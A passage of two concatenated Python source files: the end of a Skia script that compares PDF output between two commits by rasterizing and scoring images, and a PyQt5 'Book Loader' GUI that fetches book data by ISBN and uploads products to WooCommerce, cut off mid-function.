def build_and_run_dm(directory, data_dir):
dm = build_skia(directory, 'dm')
for source in SOURCES:
os.makedirs(os.path.join(data_dir, PDF_CONFIG, source))
dm_args = [dm, '--src'] + SOURCES + ['--config', PDF_CONFIG, '-w', data_dir]
if BAD_TESTS:
dm_args += ['-m'] + ['~^%s$' % x for x in BAD_TESTS]
check_call(dm_args, cwd=directory)
return dm
def rasterize(path):
ret = timeout(30, [PDFIUM_TEST, '--png', '--scale=%g' % (DPI / 72.0), path])
if ret != 0:
sys.stdout.write(
'\nTIMEOUT OR ERROR [%d] "%s"\n' % (ret, printable_path(path)))
return
assert os.path.isfile(path + '.0.png')
def main(control_commitish):
assert os.pardir == '..' and '/' in [os.sep, os.altsep]
assert test_exe(NINJA)
assert test_exe(PDFIUM_TEST)
os.chdir(os.path.dirname(__file__) + '/../..')
control_worktree = checkout_worktree(control_commitish)
tmpdir = tempfile.mkdtemp(prefix='skpdf_')
exp = tmpdir + '/experim'
con = tmpdir + '/control'
build_and_run_dm(os.curdir, exp)
dm = build_and_run_dm(control_worktree, con)
image_diff_metric = build_skia(control_worktree, 'image_diff_metric')
out = sys.stdout
common_paths = get_common_paths([con, exp], '.pdf')
out.write('\nNumber of PDFs: %d\n\n' % len(common_paths))
def compare_identical(path):
cpath, epath = (os.path.join(x, path) for x in (con, exp))
if is_same(cpath, epath):
remove(cpath, epath)
return True
return False
identical_count = shardsum(compare_identical, common_paths)
out.write('Number of identical PDFs: %d\n\n' % identical_count)
differing_paths = get_common_paths([con, exp], '.pdf')
if not differing_paths:
out.write('All PDFs are the same!\n')
sys.exit(0)
out.write('Number of differing PDFs: %d\n' % len(differing_paths))
for p in differing_paths:
out.write(' %s\n' % printable_path(tmpdir + '/*/' + p))
out.write('\n')
shard(rasterize,
[os.path.join(x, p) for p in differing_paths for x in [con, exp]])
common_pngs = get_common_paths([con, exp], '.pdf.0.png')
identical_count = shardsum(compare_identical, common_pngs)
out.write('Number of PDFs that rasterize the same: %d\n\n'
% identical_count)
differing_pngs = get_common_paths([con, exp], '.pdf.0.png')
if not differing_pngs:
out.write('All PDFs rasterize the same!\n')
sys.exit(0)
out.write('Number of PDFs that rasterize differently: %d\n'
% len(differing_pngs))
for p in differing_pngs:
out.write(' %s\n' % printable_path(tmpdir + '/*/' + p))
out.write('\n')
scores = dict()
def compare_differing_pngs(path):
cpath, epath = (os.path.join(x, path) for x in (con, exp))
s = float(subprocess.check_output([image_diff_metric, cpath, epath]))
indicator = '.' if s < 0.001 else ':' if s < 0.01 else '!'
sys.stdout.write(indicator)
sys.stdout.flush()
scores[path] = s
shard(compare_differing_pngs, differing_pngs)
paths = sorted(scores.iterkeys(), key=lambda p: -scores[p])
out.write('\n\n')
for p in paths:
pdfpath = printable_path(tmpdir + '/*/' + p.replace('.0.png', ''))
out.write(' %6.4f %s\n' % (scores[p], pdfpath))
out.write('\n')
errors = []
rc = re.compile('^' + PDF_CONFIG + r'/([^/]*)/([^/]*)\.pdf\.0\.png$')
for p in paths:
m = rc.match(p)
assert(m)
source, name = m.groups()
errors.append((source, name, scores[p]))
for source in SOURCES:
os.makedirs(os.path.join(con, REFERENCE_BACKEND, source))
dm_args = [dm, '--src'] + SOURCES + [
'--config', REFERENCE_BACKEND, '-w', con, '-m'] + [
'^%s$' % name for _, name, _ in errors]
check_call(dm_args, cwd=control_worktree)
report = tmpdir + '/report.html'
with open(report, 'w') as o:
o.write(HTML_HEAD)
o.write('c="%s/";\n' % os.path.relpath(con, tmpdir))
o.write('e="%s/";\n' % os.path.relpath(exp, tmpdir))
o.write('z=[\n')
for source, name, score in errors:
gt = REFERENCE_BACKEND + '/' + source + '/' + name + '.png'
p = '%s/%s/%s.pdf.0.png' % (PDF_CONFIG, source, name)
desc = '%s | %s | %g' % (source, name, score)
o.write('["%s","%s","%s"],\n' % (p, gt, desc))
o.write(HTML_TAIL)
out.write(printable_path(report) + '\n')
sysopen(report)
if __name__ == '__main__':
if len(sys.argv) != 2:
USAGE = ('\nusage:\n {0} COMMIT_OR_BRANCH_TO_COMPARE_TO\n\n'
'e.g.:\n {0} HEAD\nor\n {0} HEAD~1\n\n')
sys.stderr.write(USAGE.format(sys.argv[0]))
sys.exit(1)
main(sys.argv[1])
|
book_loader.py
|
'''Gui''' # pylint: disable=(invalid-name)
import ast # Use to read list from config file.
import configparser # Read config file.
import csv
import io
import json
import logging # Logging errors.
import os
import pathlib
import re
import shutil
import sys
import time
import traceback
import webbrowser
from distutils import util
from queue import Queue # Report result from threads
from threading import Thread
from PIL import Image
from PyQt5 import QtCore, QtGui, QtWidgets
from book import find_html
from book import main as book_mode
from image_downloader import get_image
from private.gui_book_updater import Ui_MainWindow
from settings import Ui_Settings
from woo import get_product as woo_get
from woo import main as woo
current_dir = (os.path.dirname(os.path.realpath(__file__)))
logging_path = os.path.join(current_dir, "logs", "gui.log")
logging.basicConfig(filename=logging_path, level=logging.WARNING,
format='%(asctime)s %(levelname)s %(name)s %(message)s')
logger=logging.getLogger(__name__)
class WorkerSignals(QtCore.QObject): # pylint: disable=(c-extension-no-member)
''' Workers signals '''
finished = QtCore.pyqtSignal() # pylint: disable=(c-extension-no-member)
error = QtCore.pyqtSignal(tuple) # pylint: disable=(c-extension-no-member)
result = QtCore.pyqtSignal(object) # pylint: disable=(c-extension-no-member)
progress = QtCore.pyqtSignal() # pylint: disable=(c-extension-no-member)
class Worker(QtCore.QRunnable): # pylint: disable=(c-extension-no-member)
''' Thread Worker '''
def __init__(self, fn, *args, **kwargs):
super(Worker, self).__init__()
# Store constructor arguments (re-used for processing)
self.fn = fn
self.args = args
self.kwargs = kwargs
self.signals = WorkerSignals()
# Add the callback to our kwargs
self.kwargs['progress_callback'] = self.signals.progress
@QtCore.pyqtSlot() # pylint: disable=(c-extension-no-member)
def run(self):
'''
Initialise the runner function with passed args, kwargs.
'''
# Retrieve args/kwargs here; and fire processing using them
try:
result = self.fn(*self.args, **self.kwargs)
except Exception as error: # pylint: disable=broad-except
logger.info(error)
traceback.print_exc()
exctype, value = sys.exc_info()[:2]
self.signals.error.emit((exctype, value, traceback.format_exc()))
else:
self.signals.result.emit(result) # Return the result of the processing
finally:
self.signals.finished.emit() # Done
class Completer(QtWidgets.QCompleter): # pylint: disable=(c-extension-no-member)
'''Category Completer'''
def __init__(self, *args, **kwargs):
super(Completer, self).__init__(*args, **kwargs)
self.setCaseSensitivity(QtCore.Qt.CaseInsensitive) # pylint: disable=(c-extension-no-member)
self.setCompletionMode(QtWidgets.QCompleter.PopupCompletion) # pylint: disable=(c-extension-no-member)
self.setWrapAround(False)
# Add texts instead of replace
def pathFromIndex(self, index):
''' ? '''
path = QtWidgets.QCompleter.pathFromIndex(self, index) # pylint: disable=(c-extension-no-member)
lst = str(self.widget().text()).split(',')
if len(lst) > 1:
path = '%s, %s' % (','.join(lst[:-1]), path)
return path
def splitPath(self, path):
''' ? '''
path = str(path.split(',')[-1]).lstrip(' ')
return [path]
class MyMainWindow(QtWidgets.QMainWindow, Ui_MainWindow): # pylint: disable=(c-extension-no-member)
''' Initialize Gui '''
def __init__(self, *args, **kwargs):
super().__init__(*args, **kwargs)
self.screen = app.primaryScreen()
print('Screen: %s' % self.screen.name())
self.size = self.screen.size()
print('Size: %d x %d' % (self.size.width(), self.size.height()))
self.rect = self.screen.availableGeometry()
print('Available: %d x %d' % ((self.rect.width()), (self.rect.height())))
self.setupUi(self)
# self.setMaximumSize(QtCore.QSize(self.rect.width(),self.rect.height()))
self.threadpool = QtCore.QThreadPool() # pylint: disable=(c-extension-no-member)
self.percent_size_line = 0.035
self.percent_size_label = 0.027
if self.rect.width() > 1700 and self.rect.height() > 900:
self.percent_size_line = 0.043
self.percent_size_label = 0.03
### RESIZING ###
self.cover_image_label.setMaximumSize(int(self.rect.width()*0.33) ,int(self.rect.height()*0.33)) # pylint: disable=(line-too-long)
self.isbn_label.setMaximumHeight(int(self.rect.height()*self.percent_size_label))
self.name_label.setMaximumHeight(int(self.rect.height()*self.percent_size_label))
self.title_label.setMaximumHeight(int(self.rect.height()*self.percent_size_label))
self.author_label.setMaximumHeight(int(self.rect.height()*self.percent_size_label))
self.publisher_label.setMaximumHeight(int(self.rect.height()*self.percent_size_label))
self.category_label.setMaximumHeight(int(self.rect.height()*self.percent_size_label))
self.year_label.setMaximumHeight(int(self.rect.height()*self.percent_size_label))
self.amount_label.setMaximumHeight(int(self.rect.height()*self.percent_size_label))
self.price_label.setMaximumHeight(int(self.rect.height()*self.percent_size_label))
self.sale_price_label.setMaximumHeight(int(self.rect.height()*self.percent_size_label))
self.description_label.setMaximumHeight(int(self.rect.height()*self.percent_size_label))
self.binding_label.setMaximumHeight(int(self.rect.height()*self.percent_size_label))
self.id_label.setMaximumHeight(int(self.rect.height()*self.percent_size_label))
self.image_size_label.setMaximumHeight(int(self.rect.height()*self.percent_size_label))
self.cover_label.setMaximumHeight(int(self.rect.height()*self.percent_size_label))
self.next_desc_button.setMaximumHeight(int(self.rect.height()*self.percent_size_label))
self.previous_desc_button.setMaximumHeight(int(self.rect.height()*self.percent_size_label))
self.name_line.setMaximumHeight(int(self.rect.height()*0.08))
self.isbn_line.setMaximumHeight(int(self.rect.height()*self.percent_size_line))
self.title_line.setMaximumHeight(int(self.rect.height()*self.percent_size_line))
self.author_line.setMaximumHeight(int(self.rect.height()*self.percent_size_line))
self.publisher_line.setMaximumHeight(int(self.rect.height()*self.percent_size_line))
self.category_line.setMaximumHeight(int(self.rect.height()*self.percent_size_line))
self.year_line.setMaximumHeight(int(self.rect.height()*self.percent_size_line))
self.amount_line.setMaximumHeight(int(self.rect.height()*self.percent_size_line))
self.price_line.setMaximumHeight(int(self.rect.height()*self.percent_size_line))
self.sale_price_line.setMaximumHeight(int(self.rect.height()*self.percent_size_line))
self.check_button.setMaximumHeight(int(self.rect.height()*self.percent_size_line))
self.binding_box.setMaximumHeight(int(self.rect.height()*self.percent_size_line))
self.gift_check_box.setMaximumHeight(int(self.rect.height()*self.percent_size_line))
self.release_check_box.setMaximumHeight(int(self.rect.height()*self.percent_size_line))
self.sale_check_box.setMaximumHeight(int(self.rect.height()*self.percent_size_line))
self.id_line.setMaximumHeight(int(self.rect.height()*self.percent_size_line))
self.clear_button.setMaximumHeight(int(self.rect.height()*self.percent_size_line))
self.load_button.setMaximumHeight(int(self.rect.height()*self.percent_size_line))
self.source_label.setMaximumHeight(int(self.rect.height()*self.percent_size_line))
self.description_text_edit.setMaximumHeight(int(self.rect.height()*0.6))
self.next_image_buttom.setMaximumHeight(int(self.rect.height()*self.percent_size_line))
self.previous_image_buttom.setMaximumHeight(int(self.rect.height()*self.percent_size_line))
self.image_change_button.setMaximumHeight(int(self.rect.height()*0.04))
self.save_to_file_button.setMaximumHeight(int(self.rect.height()*0.08))
self.settings_button.setMaximumHeight(int(self.rect.height()*0.08))
self.word_press_button.setMaximumHeight(int(self.rect.height()*0.12))
self.update_info_label.setMaximumHeight(int(self.rect.height()*self.percent_size_line))
self.config = configparser.ConfigParser()
self.config.read(os.path.join(os.path.dirname(__file__),'config', 'conf.ini'))
self.gui = {
'google' :util.strtobool(self.config.get('Source', 'google')),
'isbndb' :util.strtobool(self.config.get('Source', 'isbndb')),
'amazon' :util.strtobool(self.config.get('Source', 'amazon')),
'goodreads' :util.strtobool(self.config.get('Source', 'goodreads')),
'title_box' :True,
'authors_box' :True,
'description_box' :True,
'binding_box' :True,
'publisher_box' :True,
'publish_date_box' :True,
'categories_box' :True,
'image_box' :True
}
self.image_iterator = 0
self.image_list = []
self.current_dir = pathlib.Path(__file__).parent # Setting curret ABS path
self.setWindowIcon(QtGui.QIcon(os.path.join(self.current_dir, "private", "image", "bookloader.png"))) # pylint: disable=(c-extension-no-member, line-too-long)
self.setWindowTitle("Book Loader")
self.progress_bar = QtWidgets.QProgressBar() # pylint: disable=(c-extension-no-member)
self.statusbar.addWidget(self.progress_bar)
self.isbn_line.setValidator(QtGui.QRegExpValidator(QtCore.QRegExp("[0-9]{13}"))) # pylint: disable=(c-extension-no-member)
self.isbn_line.textChanged.connect(self.isbn_run)
self.year_line.setValidator(QtGui.QRegExpValidator(QtCore.QRegExp("[0-9]{4}"))) # pylint: disable=(c-extension-no-member)
self.amount_line.setValidator(QtGui.QRegExpValidator(QtCore.QRegExp("[0-9]{5}"))) # pylint: disable=(c-extension-no-member)
self.price_line.setValidator(QtGui.QRegExpValidator(QtCore.QRegExp("[0-9]{5}"))) # pylint: disable=(c-extension-no-member)
self.sale_price_line.setValidator(QtGui.QRegExpValidator(QtCore.QRegExp("[0-9]{5}"))) # pylint: disable=(c-extension-no-member)
self._completer = Completer(self.categories_main_list())
self.category_line.setCompleter(self._completer)
self.image_change_button.clicked.connect(self.change_image)
self.check_button.clicked.connect(self.category_exist)
self.load_button.clicked.connect(self.update_item)
self.load_button.setDisabled(True)
self.clear_button.clicked.connect(self.clear_line_edit)
self.word_press_button.setDisabled(True)
self.word_press_button.clicked.connect(self.send_to_wordpress)
self.save_to_file_button.setDisabled(True)
self.save_to_file_button.clicked.connect(self.save_item)
self.settings_button.clicked.connect(self.open_settings)
self.actionConfig.triggered.connect(self.open_settings)
self.actionSave.triggered.connect(self.save_item)
self.actionExit_program.triggered.connect(self.close)
self.actionOpen_Config_folder.triggered.connect(lambda: os.startfile(self.current_dir))
self.actionGIt_Hub.triggered.connect(lambda: webbrowser.open('https://github.com/PytongMasters')) # pylint: disable=(line-too-long)
self.actionOpen_Help.triggered.connect(lambda: webbrowser.open('https://github.com/PytongMasters')) # pylint: disable=(line-too-long)
self.actionContact_Us.triggered.connect(lambda: webbrowser.open('https://github.com/PytongMasters')) # pylint: disable=(line-too-long)
self.msg_box = QtWidgets.QMessageBox() # pylint: disable=(c-extension-no-member)
self.msg_to_send = QtWidgets.QMessageBox() # pylint: disable=(c-extension-no-member)
self.options = QtWidgets.QFileDialog.Options() # pylint: disable=(c-extension-no-member)
self.screen_size = QtWidgets.QDesktopWidget().screenGeometry(-1) # pylint: disable=(c-extension-no-member)
self.word_press_button.setShortcut("Ctrl+Return")
self.setTabOrder(self.title_line,self.author_line)
self.setTabOrder(self.publisher_line,self.category_line)
self.setTabOrder(self.category_line,self.year_line)
self.setTabOrder(self.year_line,self.amount_line)
self.setTabOrder(self.amount_line,self.price_line)
self.setTabOrder(self.price_line,self.sale_price_line)
self.setTabOrder(self.sale_price_line,self.description_text_edit)
self.shortcut_full_screen = QtWidgets.QShortcut(QtGui.QKeySequence("F11"), self) # pylint: disable=(c-extension-no-member)
self.shortcut_full_screen.activated.connect(self.full_screen)
self.shortcut_colon = QtWidgets.QShortcut(QtGui.QKeySequence("Alt+;"), self) # pylint: disable=(c-extension-no-member)
self.shortcut_colon.activated.connect(self.get_shortname_colon)
self.shortcut_comma = QtWidgets.QShortcut(QtGui.QKeySequence("Alt+,"), self) # pylint: disable=(c-extension-no-member)
self.shortcut_comma.activated.connect(self.get_shortname_comma)
self.shortcut_parenthesis = QtWidgets.QShortcut(QtGui.QKeySequence("Alt+9"), self) # pylint: disable=(c-extension-no-member)
self.shortcut_parenthesis.activated.connect(self.get_shortname_parenthesis)
self.shortcut_title_parenthesis = QtWidgets.QShortcut(QtGui.QKeySequence("Ctrl+9"), self) # pylint: disable=(c-extension-no-member)
self.shortcut_title_parenthesis.activated.connect(self.get_short_title_parenthesis)
self.shortcut_gift = QtWidgets.QShortcut(QtGui.QKeySequence("Alt+g"), self) # pylint: disable=(c-extension-no-member)
self.shortcut_gift.activated.connect(lambda: self.gift_check_box.setChecked(False)
if self.gift_check_box.isChecked() else self.gift_check_box.setChecked(True)) # pylint: disable=(line-too-long)
self.shortcut_release = QtWidgets.QShortcut(QtGui.QKeySequence("Alt+n"), self) # pylint: disable=(c-extension-no-member)
self.shortcut_release.activated.connect(lambda: self.release_check_box.setChecked(False)
if self.release_check_box.isChecked() else self.release_check_box.setChecked(True)) # pylint: disable=(line-too-long)
self.shortcut_sale = QtWidgets.QShortcut(QtGui.QKeySequence("Alt+s"), self) # pylint: disable=(c-extension-no-member)
self.shortcut_sale.activated.connect(lambda: self.sale_check_box.setChecked(False)
if self.sale_check_box.isChecked() else self.sale_check_box.setChecked(True)) # pylint: disable=(line-too-long)
self.shortcut_next_image = QtWidgets.QShortcut(QtGui.QKeySequence("Alt+right"), self) # pylint: disable=(c-extension-no-member)
self.shortcut_next_image.activated.connect(self.next_image)
self.shortcut_previous_image = QtWidgets.QShortcut(QtGui.QKeySequence("Alt+left"), self) # pylint: disable=(c-extension-no-member)
self.shortcut_previous_image.activated.connect(self.previous_image)
self.next_image_buttom.clicked.connect(self.next_image)
self.previous_image_buttom.clicked.connect(self.previous_image)
self.desc_iterator = 0
self.next_desc_button.clicked.connect(self.next_description)
self.previous_desc_button.clicked.connect(self.previous_description)
self.next_desc_button.setDisabled(True)
self.previous_desc_button.setDisabled(True)
# self.load_button2.clicked.connect(self.search_in_book)
# def search_in_book(self):
# ''' Download afresh book details '''
# self.clear_line_edit()
def full_screen(self):
if self.isFullScreen():
self.showNormal()
else:
self.showFullScreen()
def next_description(self):
""" Next description from list """
try:
if len(self.dictionary['description']) > 1:
self.desc_iterator += 1
if len(self.dictionary['description']) == self.desc_iterator:
self.desc_iterator = 0
self.description_text_edit.setPlainText(self.dictionary['description'][self.desc_iterator]) # pylint: disable=(c-extension-no-member,line-too-long)
except Exception as error: # pylint: disable=broad-except
print(error)
logger.info(error)
def previous_description(self):
""" Previous description from list """
try:
if len(self.dictionary['description']) > 1:
self.desc_iterator -= 1
if self.desc_iterator == -1:
self.desc_iterator = len(self.dictionary['description']) -1
self.description_text_edit.setPlainText(self.dictionary['description'][self.desc_iterator]) # pylint: disable=(c-extension-no-member,line-too-long)
except Exception as error: # pylint: disable=broad-except
print(error)
logger.info(error)
def get_short_title_parenthesis(self):
''' Remove subtitle between parenthesis and parenthesis '''
try:
parenthesis = re.compile("\((.*?)\)") # pylint: disable=(anomalous-backslash-in-string)
short = re.sub(parenthesis,'' ,self.title_line.text())
self.title_line.setText(short)
self.title_line.setToolTip('<html><head/><body><p><b><span style=\" font-size:12pt;\">{}</span></b></p></body></html>'.format(self.title_line.text())) # pylint: disable=(line-too-long)
self.amount_line.setFocus()
except Exception as error: # pylint: disable=broad-except
print(error)
logger.info(error)
def get_shortname_colon(self):
''' Remove subtitle between colon and dash '''
try:
colon = re.compile(':(.*?)-')
short = re.sub(colon, " -", self.name_line.toPlainText())
self.name_line.setText(short)
self.name_line.setToolTip('<html><head/><body><p><b><span style=\" font-size:16pt;\">{}</span></b></p></body></html>'.format(self.name_line.toPlainText())) # pylint: disable=(line-too-long)
self.amount_line.setFocus()
except Exception as error: # pylint: disable=broad-except
print(error)
logger.info(error)
def get_shortname_comma(self):
''' Remove subtitle between comma and dash '''
try:
comma = re.compile(',(.*?)-')
short = re.sub(comma, " -", self.name_line.toPlainText())
self.name_line.setText(short)
self.name_line.setToolTip('<html><head/><body><p><b><span style=\" font-size:16pt;\">{}</span></b></p></body></html>'.format(self.name_line.toPlainText())) # pylint: disable=(line-too-long)
self.amount_line.setFocus()
except Exception as error: # pylint: disable=broad-except
print(error)
logger.info(error)
def get_shortname_parenthesis(self):
''' Remove subtitle between parenthesis and dash '''
try:
parenthesis = re.compile("\((.*?)-") # pylint: disable=(anomalous-backslash-in-string)
short = re.sub(parenthesis, "-", self.name_line.toPlainText())
self.name_line.setText(short)
self.name_line.setToolTip('<html><head/><body><p><b><span style=\" font-size:16pt;\">{}</span></b></p></body></html>'.format(self.name_line.toPlainText())) # pylint: disable=(line-too-long)
self.amount_line.setFocus()
except Exception as error: # pylint: disable=broad-except
print(error)
logger.info(error)
def progress_fn(self):
''' Progress bar method'''
try:
self.progress_bar.setValue(0)
QtCore.QCoreApplication.processEvents() # pylint: disable=(c-extension-no-member)
self.msg_box.setWindowTitle('Pobieranie danych')
self.msg_box.setWindowIcon(QtGui.QIcon(os.path.join(self.current_dir, "private", "image", "bookloader.png"))) # pylint: disable=(c-extension-no-member),(line-too-long)
self.msg_box.setText('Pobieranie danych')
self.msg_box.show()
QtCore.QCoreApplication.processEvents() # pylint: disable=(c-extension-no-member)
for i in range(101):
if self.name_line.toPlainText() == '':
QtCore.QCoreApplication.processEvents() # pylint: disable=(c-extension-no-member)
time.sleep(0.05)
self.progress_bar.setValue(i)
else:
i = 100
self.progress_bar.setValue(i)
except Exception as error: # pylint: disable=broad-except
print("Progress fn: ",error)
logger.info(error)
def isbn_run(self):
''' Automatic run for ISBN edit line '''
try:
self.load_button.setDisabled(False)
if len(self.isbn_line.text()) == 13:
self.update_item()
except Exception as error: # pylint: disable=broad-except
print(error)
logger.info(error)
def update_item(self):
''' Update button method '''
try:
self.update_info_label.clear()
self.item = self.isbn_line.text() # pylint: disable=(attribute-defined-outside-init)
worker = Worker(self.search_item)
worker.signals.finished.connect(self.get_source)
worker.signals.progress.connect(self.progress_fn)
self.threadpool.start(worker)
except Exception as error: # pylint: disable=broad-except
print("Update item: ",error)
logger.info(error)
def search_item(self, progress_callback):
''' Search item, Mutli ThreadPool '''
try:
progress_callback.emit()
que = Queue()
thread_woo = Thread(target=lambda q, arg1: q.put(self.search_item_woo(arg1)),args=(que,self.item)) # pylint: disable=(line-too-long)
thread_book = Thread(target=lambda q, arg1: q.put(self.search_item_book(arg1)),args=(que,self.item)) # pylint: disable=(line-too-long)
thread_woo.start()
thread_book.start()
result = que.get()
if result is None:
thread_woo.join()
thread_book.join()
else:
thread_woo.join()
except Exception as error: # pylint: disable=broad-except
print("Search item: ",error)
logger.info(error)
def search_item_book(self, item): # pylint: disable=(unused-argument)
''' Search item in book '''
book_start = time.time()
try:
self.dictionary_book = book_mode(self.item, self.gui) # pylint: disable=(attribute-defined-outside-init)
except Exception as error: # pylint: disable=broad-except
print("Search item book: ",error)
logger.info(error)
self.dictionary_book = None # pylint: disable=(attribute-defined-outside-init)
print("book ",(time.time()) - book_start)
return self.dictionary_book
def search_item_woo(self, item): # pylint: disable=(unused-argument)
''' Search item in woocommerce '''
woo_start = time.time()
self.gui['name'] = True
try:
self.dictionary_woo = woo_get(self.item, self.gui) # pylint: disable=(attribute-defined-outside-init)
if not self.dictionary_woo :
self.dictionary_woo = None # pylint: disable=(attribute-defined-outside-init)
except Exception as error: # pylint: disable=broad-except
print("Search item woo: ",error)
logger.info(error)
self.dictionary_woo = None # pylint: disable=(attribute-defined-outside-init)
print("woo ",(time.time()) - woo_start)
return self.dictionary_woo
def get_source(self):
''' Compere lists from Book and Woocommerce '''
try:
if self.dictionary_woo is None:
self.dictionary = self.dictionary_book # pylint: disable=(attribute-defined-outside-init)
self.dictionary['source'] = False
self.next_desc_button.setDisabled(False)
self.previous_desc_button.setDisabled(False)
else:
self.dictionary = self.dictionary_woo # pylint: disable=(attribute-defined-outside-init)
self.dictionary['source'] = True
if self.dictionary is None:
self.update_info_label.setText("Produkt nie znaleziony")
else:
self.put_dict()
except Exception as error: # pylint: disable=broad-except
print("Get source:",error)
logger.info(error)
def put_dict(self):
''' Put dictionary to editlines '''
try:
self.msg_box.close()
self.image_list = []
self.update_info_label.clear()
if self.dictionary['source'] is False:
self.get_image_list()
else:
self.image_list.append(self.dictionary_woo['image'])
self.image_iterator = 0
self.desc_iterator = 0
except Exception as error: # pylint: disable=broad-except
print("Put Dict 1:",error)
logger.info(error)
try:
self.dictionary["image"] = get_image(self.image_list[0], self.item)
except Exception as error: # pylint: disable=broad-except
print(error)
print("Put Dict image list :",error)
self.dictionary["image"] = None
# Convert binding to Polish names
try:
if ((self.dictionary['binding']).lower() == 'hardcover') or ((self.dictionary['binding']).lower() == 'twarda'): # pylint: disable=(line-too-long)
self.dictionary['binding'] = 'twarda'
elif ((self.dictionary['binding']).lower() == 'paperback') or ((self.dictionary['binding']).lower() == 'miękka'): # pylint: disable=(line-too-long)
self.dictionary['binding'] = 'miękka'
else:
self.dictionary['binding'] = 'inna'
except Exception as error: # pylint: disable=broad-except
print("Put Dict cover check: ",error)
logger.info(error)
self.dictionary['binding'] = 'inna'
# Set dictionary to edit lines
try:
self.isbn_line.setText(self.item)
if self.dictionary['source'] is False:
self.name_line.setText(str(self.dictionary['title']) + ' - ' + str(self.dictionary['authors'])) # pylint: disable=(line-too-long)
else:
self.name_line.setText(str(self.dictionary['name']))
if self.dictionary['description']:
desc_with_html = [has_html for has_html in self.dictionary['description'] if find_html(has_html)] # pylint: disable=(line-too-long)
if desc_with_html:
if type(desc_with_html) is list:
self.description_text_edit.setPlainText(str(max(desc_with_html, key=len)))
else:
self.description_text_edit.setPlainText(str(desc_with_html))
elif type(self.dictionary['description']) is list:
self.description_text_edit.setPlainText(str(max(self.dictionary['description'], key=len))) # pylint: disable=(line-too-long)
else:
self.description_text_edit.setPlainText(str(self.dictionary['description']))
if self.dictionary['title']:
self.title_line.setText(self.dictionary['title'])
if self.dictionary['authors']:
self.author_line.setText(self.dictionary['authors'])
if self.dictionary['binding']:
self.binding_box.setCurrentIndex(self.binding_box.findText(self.dictionary['binding']))
if self.dictionary['publisher']:
self.publisher_line.setText(self.dictionary['publisher'])
if self.dictionary['categories']:
self.category_line.setText(",".join(list(self.dictionary['categories'])))
if self.dictionary['publish_date']:
self.year_line.setText(self.dictionary['publish_date'])
except Exception as error: # pylint: disable=broad-except
print("Put Dict to edit lines : ",error)
logger.info(error)
# Show image
try:
if self.dictionary['image']:
self.cover_image_label.setPixmap(QtGui.QPixmap(self.dictionary['image'])) # pylint: disable=(c-extension-no-member)
im = Image.open(self.dictionary["image"])
self.image_size_label.setText(str(im.size))
except Exception as error: # pylint: disable=broad-except
print("Put Dict - show image: ",error)
logger.info(error)
# Show source and specific edit lines
try:
if self.dictionary['source'] is False:
self.source_label.setText("Stwórz nowy produkt")
self.amount_line.setText('1')
else:
self.source_label.setText("Zaktualizuj istniejący produkt")
self.id_line.setText(str(self.dictionary['id']))
if self.dictionary['tags']:
if 'Sale' in self.dictionary['tags']:
self.sale_check_box.setChecked(True)
if 'New Release' in self.dictionary['tags']:
self.release_check_box.setChecked(True)
if 'Perfect Gift' in self.dictionary['tags']:
self.release_check_box.setChecked(True)
try:
self.sale_price_line.setText(str(self.dictionary['sale_price']))
self.amount_line.setText(str(self.dictionary['amount']))
self.price_line.setText(str(self.dictionary['price']))
except Exception as error: # pylint: disable=broad-except
print("Put Dict - show price/amount: ",error)
logger.info(error)
except Exception as error: # pylint: disable=broad-except
print("Put Dict - source and other: ",error)
logger.info(error)
# Disable / Undisable buttons
try:
self.save_to_file_button.setDisabled(False)
self.word_press_button.setDisabled(False)
self.load_button.setDisabled(True)
self.name_line.setToolTip('<html><head/><body><p><b><span style=\" font-size:16pt;\">{}</span></b></p></body></html>'.format(self.name_line.toPlainText())) # pylint: disable=(line-too-long)
self.title_line.setToolTip('<html><head/><body><p><b><span style=\" font-size:16pt;\">{}</span></b></p></body></html>'.format(self.title_line.text())) # pylint: disable=(line-too-long)
self.amount_line.setFocus()
except Exception as error: # pylint: disable=broad-except
print("Put Dict 3:",error)
logger.info(error)
def get_dictionary(self):
''' Getting dictionary from edit lines '''
tags = []
if self.sale_check_box.isChecked():
tags.append('Sale')
if self.release_check_box.isChecked():
tags.append('New Release')
if self.gift_check_box.isChecked():
tags.append('Perfect Gift')
try:
self.dictionary_to_save = { # pylint: disable=(attribute-defined-outside-init)
'isbn' : self.isbn_line.text(),
'name' : self.name_line.toPlainText(),
'title' : self.title_line.text(),
'authors' : self.author_line.text(),
'description' : self.description_text_edit.toPlainText(),
'binding' : self.binding_box.currentText(),
'publisher' : self.publisher_line.text(),
'publish_date' : self.year_line.text(),
'image': self.dictionary['image'],
'categories' : self.category_to_save,
'price' : self.price_line.text(),
'amount' : self.amount_line.text(),
'source' : self.dictionary['source'],
'tags' : tags
}
if self.dictionary["source"]:
self.dictionary_to_save['id'] = self.dictionary["id"]
if self.sale_price_line.text():
self.dictionary_to_save['sale_price'] = self.sale_price_line.text()
except Exception as error: # pylint: disable=broad-except
print("Get dictionary method:\n",error)
logger.info(error)
return self.dictionary_to_save
def send_to_wordpress(self):
''' Method to send product / Check line edit if not empty '''
try:
self.category_exist()
self.woocommerce_dict = self.get_dictionary() # pylint: disable=(attribute-defined-outside-init)
if (self.price_line.text() == '') or (self.amount_line.text() == '')or (self.description_text_edit.toPlainText() == '') or (self.name_line.toPlainText() == '') or (self.title_line.text() == '') or (self.author_line.text() == '') or (self.publisher_line.text() == '') or (self.year_line.text() == '') or (self.category_line.text() == ''): # pylint: disable=(line-too-long)
self.msg_to_send.setWindowTitle('Uwaga!')
self.msg_to_send.setWindowIcon(QtGui.QIcon(os.path.join(self.current_dir, "private", "image", "bookloader.png"))) # pylint: disable=(c-extension-no-member),(line-too-long)
self.msg_to_send.setIcon(QtWidgets.QMessageBox.Warning) # pylint: disable=(c-extension-no-member)
self.msg_to_send.setText('Podaj resztę danych')
self.msg_to_send.show()
else:
worker = Worker(self.word)
self.threadpool.start(worker)
worker.signals.finished.connect(lambda: self.update_info_label.setText(self.message)) # pylint: disable=(line-too-long)
self.clear_line_edit()
self.load_button.setDisabled(True)
self.next_desc_button.setDisabled(True)
self.previous_desc_button.setDisabled(True)
except Exception as error: # pylint: disable=broad-except
print("\nSend to wordpress method: \n",error)
logger.info(error)
def word(self,progress_callback):
''' Worker to send product to Woocommerce '''
progress_callback.emit()
try:
self.post_product = woo(self.woocommerce_dict) # pylint: disable=(attribute-defined-outside-init)
if self.post_product['source']:
self.message = "Produkt został zaktualizowany" # pylint: disable=(attribute-defined-outside-init)
else:
self.message = "Dodano nowy produkt" # pylint: disable=(attribute-defined-outside-init)
except Exception as error: # pylint: disable=broad-except
print("\nWord method:\n",error)
logger.info(error)
def get_image_list(self):
""" Merge image list """
try:
